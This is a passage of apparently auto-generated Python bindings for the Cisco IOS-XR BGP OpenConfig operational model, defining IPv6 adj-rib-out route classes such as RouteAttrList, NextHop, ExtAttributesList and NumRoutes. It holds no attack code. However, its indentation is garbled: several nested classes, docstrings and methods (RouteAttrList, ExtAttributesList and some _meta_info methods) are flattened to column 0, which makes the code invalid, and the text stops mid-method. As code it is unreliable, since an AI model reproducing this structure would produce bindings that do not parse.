        self._child_classes = OrderedDict([("prefix", ("prefix", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName.Prefix))])
        self._leafs = OrderedDict([
            ('prefix_length', (YLeaf(YType.uint8, 'prefix-length'), ['int'])),
        ])
        self.prefix_length = None

        # Eagerly instantiate the singleton 'prefix' child container.
        self.prefix = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName.Prefix()
        self.prefix.parent = self
        self._children_name_map["prefix"] = "prefix"
        self._segment_path = lambda: "prefix-name"
        # Freeze last so the preceding assignments are accepted by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName, ['prefix_length'], name, value)

    class Prefix(_Entity_):
        """
        Prefix
        .. attribute:: afi
        AFI
        **type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
        **config**\: False
        .. attribute:: ipv4_address
        IPv4 Addr
        **type**\: str
        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        **config**\: False
        .. attribute:: ipv6_address
        IPv6 Addr
        **type**\: str
        **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
        **config**\: False
        """

        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'

        def __init__(self):
            # Py2/Py3-compatible call into the _Entity_ base initializer.
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName.Prefix, self).__init__()

            self.yang_name = "prefix"
            self.yang_parent_name = "prefix-name"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])  # leaf-only container
            self._leafs = OrderedDict([
                ('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
                ('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
                ('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
            ])
            self.afi = None
            self.ipv4_address = None
            self.ipv6_address = None
            self._segment_path = lambda: "prefix"
            # Freeze last so the preceding assignments are accepted by __setattr__.
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName.Prefix, ['afi', 'ipv4_address', 'ipv6_address'], name, value)

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName.Prefix']['meta_info']

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName']['meta_info']
class RouteAttrList(_Entity_):
"""
RouteAttributesList
.. attribute:: next_hop
NextHopAddress
**type**\: :py:class:`NextHop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.NextHop>`
**config**\: False
.. attribute:: aggregrator_attributes
AggregatorList
**type**\: :py:class:`AggregratorAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.AggregratorAttributes>`
**config**\: False
.. attribute:: origin_type
Origin Attribute Type
**type**\: :py:class:`BgpOcOriginAttr <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcOriginAttr>`
**config**\: False
.. attribute:: as_path
AS Path
**type**\: str
**config**\: False
.. attribute:: as4_path
AS4 Path
**type**\: str
**config**\: False
.. attribute:: med
Med
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: local_pref
LocalPref
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: atomic_aggr
AtomicAggr
**type**\: bool
**config**\: False
.. attribute:: community
CommunityArray
**type**\: list of :py:class:`Community <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.Community>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    # Py2/Py3-compatible call into the _Entity_ base initializer.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList, self).__init__()

    self.yang_name = "route-attr-list"
    self.yang_parent_name = "route"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Maps YANG child segment -> (python attribute name, child class).
    self._child_classes = OrderedDict([("next-hop", ("next_hop", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.NextHop)), ("aggregrator-attributes", ("aggregrator_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.AggregratorAttributes)), ("community", ("community", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.Community))])
    self._leafs = OrderedDict([
        ('origin_type', (YLeaf(YType.enumeration, 'origin-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcOriginAttr', '')])),
        ('as_path', (YLeaf(YType.str, 'as-path'), ['str'])),
        ('as4_path', (YLeaf(YType.str, 'as4-path'), ['str'])),
        ('med', (YLeaf(YType.uint32, 'med'), ['int'])),
        ('local_pref', (YLeaf(YType.uint32, 'local-pref'), ['int'])),
        ('atomic_aggr', (YLeaf(YType.boolean, 'atomic-aggr'), ['bool'])),
    ])
    self.origin_type = None
    self.as_path = None
    self.as4_path = None
    self.med = None
    self.local_pref = None
    self.atomic_aggr = None

    # Eagerly instantiate the singleton children; 'community' is a YANG list.
    self.next_hop = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.NextHop()
    self.next_hop.parent = self
    self._children_name_map["next_hop"] = "next-hop"
    self.aggregrator_attributes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.AggregratorAttributes()
    self.aggregrator_attributes.parent = self
    self._children_name_map["aggregrator_attributes"] = "aggregrator-attributes"
    self.community = YList(self)
    self._segment_path = lambda: "route-attr-list"
    # Freeze last so the preceding assignments are accepted by __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    # Route every attribute write through YDK's validating setter.
    writable_leafs = [
        'origin_type',
        'as_path',
        'as4_path',
        'med',
        'local_pref',
        'atomic_aggr',
    ]
    self._perform_setattr(
        OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList,
        writable_leafs,
        name,
        value)
class NextHop(_Entity_):
    """
    NextHopAddress
    .. attribute:: afi
    AFI
    **type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
    **config**\: False
    .. attribute:: ipv4_address
    IPv4 Addr
    **type**\: str
    **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
    **config**\: False
    .. attribute:: ipv6_address
    IPv6 Addr
    **type**\: str
    **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
    **config**\: False
    """

    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Py2/Py3-compatible call into the _Entity_ base initializer.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.NextHop, self).__init__()

        self.yang_name = "next-hop"
        self.yang_parent_name = "route-attr-list"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # leaf-only container
        self._leafs = OrderedDict([
            ('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
            ('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
            ('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
        ])
        self.afi = None
        self.ipv4_address = None
        self.ipv6_address = None
        self._segment_path = lambda: "next-hop"
        # Freeze last so the preceding assignments are accepted by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.NextHop, ['afi', 'ipv4_address', 'ipv6_address'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.NextHop']['meta_info']
class AggregratorAttributes(_Entity_):
    """
    AggregatorList
    .. attribute:: as_
    AS number
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: as4
    AS4 number
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: address
    IPv4 address
    **type**\: str
    **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
    **config**\: False
    """

    # NOTE: "Aggregrator" misspelling comes from the YANG model and must stay.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Py2/Py3-compatible call into the _Entity_ base initializer.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.AggregratorAttributes, self).__init__()

        self.yang_name = "aggregrator-attributes"
        self.yang_parent_name = "route-attr-list"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # leaf-only container
        self._leafs = OrderedDict([
            # 'as_' carries a trailing underscore because 'as' is a Python keyword;
            # the YANG leaf name is plain 'as'.
            ('as_', (YLeaf(YType.uint32, 'as'), ['int'])),
            ('as4', (YLeaf(YType.uint32, 'as4'), ['int'])),
            ('address', (YLeaf(YType.str, 'address'), ['str'])),
        ])
        self.as_ = None
        self.as4 = None
        self.address = None
        self._segment_path = lambda: "aggregrator-attributes"
        # Freeze last so the preceding assignments are accepted by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.AggregratorAttributes, ['as_', 'as4', 'address'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.AggregratorAttributes']['meta_info']
class Community(_Entity_):
    """
    CommunityArray
    .. attribute:: objects
    BGP OC objects
    **type**\: str
    **config**\: False
    """

    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Py2/Py3-compatible call into the _Entity_ base initializer.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.Community, self).__init__()

        self.yang_name = "community"
        self.yang_parent_name = "route-attr-list"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # leaf-only container
        self._leafs = OrderedDict([
            ('objects', (YLeaf(YType.str, 'objects'), ['str'])),
        ])
        self.objects = None
        self._segment_path = lambda: "community"
        # Freeze last so the preceding assignments are accepted by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.Community, ['objects'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList.Community']['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-information entry for RouteAttrList."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    entry = meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList']
    return entry['meta_info']
class ExtAttributesList(_Entity_):
"""
ExtAttributesList
.. attribute:: originator_id
OriginatorID
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: aigp
AIGP
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
.. attribute:: path_id
PathId
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: cluster
ClusterList
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ext_community
ExtendedCommunityArray
**type**\: list of :py:class:`ExtCommunity <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.ExtCommunity>`
**config**\: False
.. attribute:: unknown_attributes
UnknownAttributes
**type**\: list of :py:class:`UnknownAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.UnknownAttributes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    # Py2/Py3-compatible call into the _Entity_ base initializer.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList, self).__init__()

    self.yang_name = "ext-attributes-list"
    self.yang_parent_name = "route"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Maps YANG child segment -> (python attribute name, child class).
    self._child_classes = OrderedDict([("ext-community", ("ext_community", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.ExtCommunity)), ("unknown-attributes", ("unknown_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.UnknownAttributes))])
    self._leafs = OrderedDict([
        ('originator_id', (YLeaf(YType.str, 'originator-id'), ['str'])),
        ('aigp', (YLeaf(YType.uint64, 'aigp'), ['int'])),
        ('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
        # 'cluster' is a leaf-list, hence YLeafList and a python list value.
        ('cluster', (YLeafList(YType.str, 'cluster'), ['str'])),
    ])
    self.originator_id = None
    self.aigp = None
    self.path_id = None
    self.cluster = []
    self.ext_community = YList(self)
    self.unknown_attributes = YList(self)
    self._segment_path = lambda: "ext-attributes-list"
    # Freeze last so the preceding assignments are accepted by __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    # Route every attribute write through YDK's validating setter.
    writable_leafs = [
        'originator_id',
        'aigp',
        'path_id',
        'cluster',
    ]
    self._perform_setattr(
        OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList,
        writable_leafs,
        name,
        value)
class ExtCommunity(_Entity_):
    """
    ExtendedCommunityArray
    .. attribute:: objects
    BGP OC objects
    **type**\: str
    **config**\: False
    """

    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Py2/Py3-compatible call into the _Entity_ base initializer.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.ExtCommunity, self).__init__()

        self.yang_name = "ext-community"
        self.yang_parent_name = "ext-attributes-list"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # leaf-only container
        self._leafs = OrderedDict([
            ('objects', (YLeaf(YType.str, 'objects'), ['str'])),
        ])
        self.objects = None
        self._segment_path = lambda: "ext-community"
        # Freeze last so the preceding assignments are accepted by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.ExtCommunity, ['objects'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.ExtCommunity']['meta_info']
class UnknownAttributes(_Entity_):
    """
    UnknownAttributes
    .. attribute:: attribute_type
    AttributeType
    **type**\: int
    **range:** 0..65535
    **config**\: False
    .. attribute:: attribute_length
    AttributeLength
    **type**\: int
    **range:** 0..65535
    **config**\: False
    .. attribute:: attribute_value
    Atributevalue
    **type**\: str
    **pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?
    **config**\: False
    """

    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Py2/Py3-compatible call into the _Entity_ base initializer.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.UnknownAttributes, self).__init__()

        self.yang_name = "unknown-attributes"
        self.yang_parent_name = "ext-attributes-list"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # leaf-only container
        self._leafs = OrderedDict([
            ('attribute_type', (YLeaf(YType.uint16, 'attribute-type'), ['int'])),
            ('attribute_length', (YLeaf(YType.uint16, 'attribute-length'), ['int'])),
            ('attribute_value', (YLeaf(YType.str, 'attribute-value'), ['str'])),
        ])
        self.attribute_type = None
        self.attribute_length = None
        self.attribute_value = None
        self._segment_path = lambda: "unknown-attributes"
        # Freeze last so the preceding assignments are accepted by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.UnknownAttributes, ['attribute_type', 'attribute_length', 'attribute_value'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.UnknownAttributes']['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-information entry for ExtAttributesList."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    entry = meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList']
    return entry['meta_info']
class LastModifiedDate(_Entity_):
    """
    LastModifiedDate
    .. attribute:: time_value
    TimeValue
    **type**\: str
    **config**\: False
    """

    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Py2/Py3-compatible call into the _Entity_ base initializer.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastModifiedDate, self).__init__()

        self.yang_name = "last-modified-date"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])  # leaf-only container
        self._leafs = OrderedDict([
            ('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
        ])
        self.time_value = None
        self._segment_path = lambda: "last-modified-date"
        # Freeze last so the preceding assignments are accepted by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastModifiedDate, ['time_value'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastModifiedDate']['meta_info']
class LastUpdateRecieved(_Entity_):
    """
    LastUpdateRecieved
    .. attribute:: time_value
    TimeValue
    **type**\: str
    **config**\: False
    """

    # NOTE: "Recieved" spelling comes from the YANG model; kept for fidelity.
    # YANG module prefix and revision this generated binding was built from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Python 2/3 compatible super() call for a deeply nested class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastUpdateRecieved, self).__init__()
        # YANG schema bookkeeping used by YDK path resolution.
        self.yang_name = "last-update-recieved"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf registry: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
        ])
        self.time_value = None
        self._segment_path = lambda: "last-update-recieved"
        # Freeze: from here on, attribute writes are validated by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastUpdateRecieved, ['time_value'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastUpdateRecieved']['meta_info']
@staticmethod
def _meta_info():
    """Return this class's entry from the generated meta-information table."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    table_entry = meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route']
    return table_entry['meta_info']
@staticmethod
def _meta_info():
    """Return this class's entry from the generated meta-information table."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    table_entry = meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes']
    return table_entry['meta_info']
class NumRoutes(_Entity_):
    """
    Number of routes in adjacency rib out\-bound
    post\-policy table
    .. attribute:: num_routes
    NumRoutes
    **type**\: int
    **range:** 0..18446744073709551615
    **config**\: False
    """

    # YANG module prefix and revision this generated binding was built from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Python 2/3 compatible super() call for a deeply nested class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.NumRoutes, self).__init__()
        # YANG schema bookkeeping used by YDK path resolution.
        self.yang_name = "num-routes"
        self.yang_parent_name = "adj-rib-out-post"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        # Leaf registry: python attribute -> (YLeaf descriptor, accepted python types).
        self._leafs = OrderedDict([
            ('num_routes', (YLeaf(YType.uint64, 'num-routes'), ['int'])),
        ])
        self.num_routes = None
        self._segment_path = lambda: "num-routes"
        # Freeze: from here on, attribute writes are validated by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.NumRoutes, ['num_routes'], name, value)

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.NumRoutes']['meta_info']
@staticmethod
def _meta_info():
    """Return this class's entry from the generated meta-information table."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
